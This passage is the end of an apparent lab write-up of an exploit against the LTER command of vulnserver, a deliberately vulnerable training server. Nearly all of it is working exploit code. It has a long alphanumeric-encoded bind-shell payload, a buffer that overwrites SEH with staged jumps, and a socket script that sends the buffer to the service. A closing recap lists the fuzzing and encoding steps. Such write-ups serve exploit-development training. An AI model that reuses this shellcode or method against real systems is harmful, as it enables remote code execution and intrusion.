stage4 += "\x05\x11\x02\x52\x64" ## add eax, 0x64520211
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x37\x25\x70\x06" ## add eax, 0x06702537
stage4 += "\x05\x26\x25\x60\x06" ## add eax, 0x06602526
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x62\x76\x33\x32" ## add eax, 0x32337662
stage4 += "\x05\x51\x65\x33\x31" ## add eax, 0x31336551
stage4 += "\x05\x62\x53\x33\x22" ## add eax, 0x22335362
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x62\x17\x44\x52" ## add eax, 0x52441762
stage4 += "\x05\x51\x16\x44\x41" ## add eax, 0x41441651
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x16\x31\x76\x26" ## add eax, 0x26763116
stage4 += "\x05\x15\x30\x66\x15" ## add eax, 0x15663015
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x17\x33\x65\x76" ## add eax, 0x76653317
stage4 += "\x05\x16\x23\x54\x66" ## add eax, 0x66542316
stage4 += "\x05\x15\x22\x44\x54" ## add eax, 0x54442215
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x66\x62\x34" ## add eax, 0x34626655
stage4 += "\x05\x55\x55\x61\x34" ## add eax, 0x34615555
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x15\x30\x23\x62" ## add eax, 0x62233015
stage4 += "\x05\x15\x40\x24\x51" ## add eax, 0x51244015
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x30\x63\x31\x17" ## add eax, 0x17316330
stage4 += "\x05\x40\x63\x20\x17" ## add eax, 0x17206340
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x66\x47\x62\x62" ## add eax, 0x62624766
stage4 += "\x05\x56\x46\x52\x52" ## add eax, 0x52524656
stage4 += "\x05\x34\x35\x32\x32" ## add eax, 0x32323534
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x57\x13\x72\x71" ## add eax, 0x71721357
stage4 += "\x05\x46\x04\x72\x61" ## add eax, 0x61720446
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x07\x24\x12\x56" ## add eax, 0x56122407
stage4 += "\x05\x07\x24\x02\x45" ## add eax, 0x45022407
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x14\x31\x32\x73" ## add eax, 0x73323114
stage4 += "\x05\x14\x22\x31\x63" ## add eax, 0x63312214
stage4 += "\x05\x14\x21\x32\x53" ## add eax, 0x53322114
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x42\x41\x17\x33" ## add eax, 0x33174142
stage4 += "\x05\x32\x41\x16\x23" ## add eax, 0x23164132
stage4 += "\x05\x32\x31\x15\x23" ## add eax, 0x23153132
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x50\x33\x71" ## add eax, 0x71335033
stage4 += "\x05\x22\x50\x23\x60" ## add eax, 0x60235022
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x23\x12\x13\x67" ## add eax, 0x67131223
stage4 += "\x05\x13\x02\x14\x67" ## add eax, 0x67140213
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x12\x22\x57\x33" ## add eax, 0x33572212
stage4 += "\x05\x22\x21\x46\x23" ## add eax, 0x23462122
stage4 += "\x05\x12\x22\x45\x22" ## add eax, 0x22452212
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x71\x63\x41\x63" ## add eax, 0x63416371
stage4 += "\x05\x62\x52\x41\x53" ## add eax, 0x53415262
stage4 += "\x05\x51\x62\x31\x32" ## add eax, 0x32316251
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x42\x36\x63\x76" ## add eax, 0x76633642
stage4 += "\x05\x42\x25\x53\x65" ## add eax, 0x65532542
stage4 += "\x05\x42\x24\x63\x54" ## add eax, 0x54632442
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x52\x32\x31\x42" ## add eax, 0x42313252
stage4 += "\x05\x52\x42\x40\x41" ## add eax, 0x41404252
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x71\x76\x63\x10" ## add eax, 0x10637671
stage4 += "\x05\x70\x65\x62\x10" ## add eax, 0x10626570
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x26\x57\x66" ## add eax, 0x66572633
stage4 += "\x05\x32\x26\x46\x55" ## add eax, 0x55462632
stage4 += "\x05\x32\x24\x45\x46" ## add eax, 0x46452432
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x61\x40\x33" ## add eax, 0x33406155
stage4 += "\x05\x44\x51\x40\x32" ## add eax, 0x32405144
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x51\x34\x73\x66" ## add eax, 0x66733451
stage4 += "\x05\x40\x24\x74\x66" ## add eax, 0x66742440
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x36\x33\x64\x56" ## add eax, 0x56643336
stage4 += "\x05\x45\x24\x54\x55" ## add eax, 0x55542445
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x46\x73\x13\x61" ## add eax, 0x61137346
stage4 += "\x05\x45\x63\x03\x61" ## add eax, 0x61036345
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x70\x50\x76\x30" ## add eax, 0x30765070
stage4 += "\x05\x60\x50\x75\x40" ## add eax, 0x40755060
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x03\x23\x72\x73" ## add eax, 0x73722303
stage4 += "\x05\x02\x12\x71\x62" ## add eax, 0x62711202
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x32\x37\x12\x14" ## add eax, 0x14123732
stage4 += "\x05\x32\x27\x01\x14" ## add eax, 0x14012732
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x21\x16\x46\x74" ## add eax, 0x74461621
stage4 += "\x05\x21\x15\x35\x64" ## add eax, 0x64351521
stage4 += "\x05\x21\x16\x33\x54" ## add eax, 0x54331621
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x47\x66\x32\x25" ## add eax, 0x25326647
stage4 += "\x05\x46\x56\x31\x24" ## add eax, 0x24315646
stage4 += "\x05\x35\x64\x22\x24" ## add eax, 0x24226435
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x53\x04\x66\x62" ## add eax, 0x62660453
stage4 += "\x05\x42\x04\x56\x61" ## add eax, 0x61560442
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x76\x47\x26\x66" ## add eax, 0x66264776
stage4 += "\x05\x66\x47\x15\x56" ## add eax, 0x56154766
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x42\x13\x42\x47" ## add eax, 0x47421342
stage4 += "\x05\x32\x22\x42\x46" ## add eax, 0x46422232
stage4 += "\x05\x32\x12\x42\x35" ## add eax, 0x35421232
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x76\x01\x70\x67" ## add eax, 0x67700176
stage4 += "\x05\x65\x01\x70\x56" ## add eax, 0x56700165
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x27\x66\x26" ## add eax, 0x26662713
stage4 += "\x05\x23\x16\x65\x26" ## add eax, 0x26651623
stage4 += "\x05\x13\x25\x46\x24" ## add eax, 0x24462513
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x61\x11\x32\x30" ## add eax, 0x30321161
stage4 += "\x05\x61\x01\x41\x20" ## add eax, 0x20410161
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x16\x63\x74\x66" ## add eax, 0x66746316
stage4 += "\x05\x26\x53\x64\x55" ## add eax, 0x55645326
stage4 += "\x05\x14\x33\x53\x34" ## add eax, 0x34533314
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x43\x73\x71" ## add eax, 0x71734355
stage4 += "\x05\x55\x43\x73\x61" ## add eax, 0x61734355
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x64\x64\x67\x43" ## add eax, 0x43676464
stage4 += "\x05\x54\x53\x56\x33" ## add eax, 0x33565354
stage4 += "\x05\x63\x63\x35\x33" ## add eax, 0x33356363
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x62\x16\x15" ## add eax, 0x15166255
stage4 += "\x05\x55\x61\x05\x15" ## add eax, 0x15056155
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x11\x26\x66\x56" ## add eax, 0x56662611
stage4 += "\x05\x10\x16\x65\x45" ## add eax, 0x45651610
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x57\x74\x60\x57" ## add eax, 0x57607457
stage4 += "\x05\x47\x74\x50\x47" ## add eax, 0x47507447
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x71\x56\x73\x35" ## add eax, 0x35735671
stage4 += "\x05\x60\x45\x63\x45" ## add eax, 0x45634560
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x76\x76\x16\x43" ## add eax, 0x43167676
stage4 += "\x05\x65\x65\x26\x32" ## add eax, 0x32266565
stage4 += "\x05\x54\x54\x14\x32" ## add eax, 0x32145454
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x35\x61\x22" ## add eax, 0x22613533
stage4 += "\x05\x43\x25\x50\x22" ## add eax, 0x22502543
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x54\x67\x11\x71" ## add eax, 0x71116754
stage4 += "\x05\x54\x67\x10\x71" ## add eax, 0x71106754
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x63\x71\x54" ## add eax, 0x54716313
stage4 += "\x05\x02\x52\x61\x44" ## add eax, 0x44615202
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x75\x67\x55\x35" ## add eax, 0x35556775
stage4 += "\x05\x75\x57\x45\x25" ## add eax, 0x25455775
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x67\x37\x37" ## add eax, 0x37376713
stage4 += "\x05\x04\x57\x26\x26" ## add eax, 0x26265704
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x11\x11\x31" ## add eax, 0x31111163
stage4 += "\x05\x63\x21\x21\x32" ## add eax, 0x32212163
stage4 += "\x05\x43\x11\x11\x21" ## add eax, 0x21111143
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x14\x41\x60\x14" ## add eax, 0x14604114
stage4 += "\x05\x04\x40\x50\x04" ## add eax, 0x04504004
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x17\x23\x26\x55" ## add eax, 0x55262317
stage4 += "\x05\x06\x14\x15\x55" ## add eax, 0x55151406
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x37\x12\x53" ## add eax, 0x53123733
stage4 += "\x05\x32\x47\x11\x52" ## add eax, 0x52114732
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x25\x36\x40\x31" ## add eax, 0x31403625
stage4 += "\x05\x15\x26\x40\x30" ## add eax, 0x30402615
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x26\x37\x07\x75" ## add eax, 0x75073726
stage4 += "\x05\x15\x36\x06\x74" ## add eax, 0x74063615
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x53\x72\x74\x15" ## add eax, 0x15747253
stage4 += "\x05\x42\x72\x74\x04" ## add eax, 0x04747242
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x67\x63\x32\x31" ## add eax, 0x31326367
stage4 += "\x05\x66\x62\x22\x22" ## add eax, 0x22226266
stage4 += "\x05\x45\x42\x22\x21" ## add eax, 0x21224245
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x52\x31\x32\x12" ## add eax, 0x12323152
stage4 += "\x05\x41\x30\x21\x12" ## add eax, 0x12213041
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x36\x44\x11\x36" ## add eax, 0x36114436
stage4 += "\x05\x35\x44\x12\x35" ## add eax, 0x35124435
stage4 += "\x05\x36\x33\x11\x33" ## add eax, 0x33113336
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x57\x33\x60\x16" ## add eax, 0x16603357
stage4 += "\x05\x46\x42\x60\x15" ## add eax, 0x15604246
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x37\x10\x17\x11" ## add eax, 0x11171037
stage4 += "\x05\x27\x10\x07\x01" ## add eax, 0x01071027
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x66\x61\x47\x41" ## add eax, 0x41476166
stage4 += "\x05\x56\x61\x36\x41" ## add eax, 0x41366156
stage4 += "\x05\x64\x41\x35\x41" ## add eax, 0x41354164
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x34\x63\x21\x17" ## add eax, 0x17216334
stage4 += "\x05\x23\x53\x21\x16" ## add eax, 0x16215323
stage4 += "\x05\x23\x63\x21\x15" ## add eax, 0x15216323
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x21\x24\x27\x53" ## add eax, 0x53272421
stage4 += "\x05\x12\x14\x26\x43" ## add eax, 0x43261412
stage4 += "\x05\x21\x24\x25\x43" ## add eax, 0x43252421
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x25\x36\x46\x16" ## add eax, 0x16463625
stage4 += "\x05\x24\x45\x45\x16" ## add eax, 0x16454524
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x44\x67\x63\x41" ## add eax, 0x41636744
stage4 += "\x05\x34\x56\x53\x41" ## add eax, 0x41535634
stage4 += "\x05\x34\x65\x42\x31" ## add eax, 0x31426534
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x24\x46\x46\x57" ## add eax, 0x57464624
stage4 += "\x05\x24\x45\x45\x46" ## add eax, 0x46454524
stage4 += "\x05\x24\x33\x34\x45" ## add eax, 0x45343324
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x11\x34\x46" ## add eax, 0x46341133
stage4 += "\x05\x32\x12\x34\x45" ## add eax, 0x45341232
stage4 += "\x05\x22\x11\x34\x46" ## add eax, 0x46341122
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x13\x76\x41\x36" ## add eax, 0x36417613
stage4 += "\x05\x23\x65\x42\x36" ## add eax, 0x36426523
stage4 += "\x05\x13\x56\x41\x24" ## add eax, 0x24415613
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x07\x02\x21\x55" ## add eax, 0x55210207
stage4 += "\x05\x07\x01\x20\x54" ## add eax, 0x54200107
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x02\x21\x33" ## add eax, 0x33210263
stage4 += "\x05\x64\x02\x10\x24" ## add eax, 0x24100264
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x65\x61\x32\x42" ## add eax, 0x42326165
stage4 += "\x05\x64\x50\x21\x41" ## add eax, 0x41215064
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x54\x73\x16\x26" ## add eax, 0x26167354
stage4 += "\x05\x43\x62\x15\x15" ## add eax, 0x15156243
stage4 += "\x05\x43\x52\x13\x23" ## add eax, 0x23135243
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x45\x73\x65\x13" ## add eax, 0x13657345
stage4 += "\x05\x44\x74\x55\x03" ## add eax, 0x03557444
stage4 += "\x50" ## push eax
payload = ""
payload += vuln_command
payload += stage4                                           ## stage 4: encoded bind shell, placed at the front of the buffer
payload += "A" * (offset - len(stage1) - 73 - len(stage4))  ## filler up to the 73-byte slot reserved for stage 3
payload += stage3                                           ## stage 3: encoded long JMP back to stage 4
payload += "B" * (73 - len(stage3))                         ## pad the stage 3 slot to 73 bytes
payload += stage1                                           ## nSEH: stage 1, 4-byte conditional JMP
payload += seh                                              ## SEH: bad-character-free POP POP RET
payload += "C" * 2
payload += stage2                                           ## stage 2: encoded short JMP back (\xEB\x80)
payload += "C" * (crash - 4 - offset - 2 - len(stage2))     ## pad out to the crash length
print "[+] Sending buffer (Size: %d)" % len(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 9999))
print(s.recv(1024))
s.send(payload)
s.close()

Once we run the final_lter.py script, the encoded bind shell executes and we can connect to it on port 443.

Final Exploit

Conclusion

To recap:

  1. We fuzzed the vulnserver LTER command with boofuzz.
  2. Reproduced the crash and confirmed that the LTER command input overwrites the SEH handler.
  3. Identified the bad/restricted characters.
  4. Found the offset to the SEH overwrite.
  5. Found a bad-character-free POP POP RET gadget address.
  6. [#1 Stage Shellcode] 4-byte conditional JMP placed in nSEH.
  7. [#2 Stage Shellcode] 50-byte encoded short JMP (\xEB\x80).
  8. [#3 Stage Shellcode] 67-byte encoded long JMP (PUSH ESP → POP EBX → subtract the necessary bytes → CALL EBX).
  9. [#4 Stage Shellcode] Encoded bind shell: the msfvenom bind shell, encoded with Slink.
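
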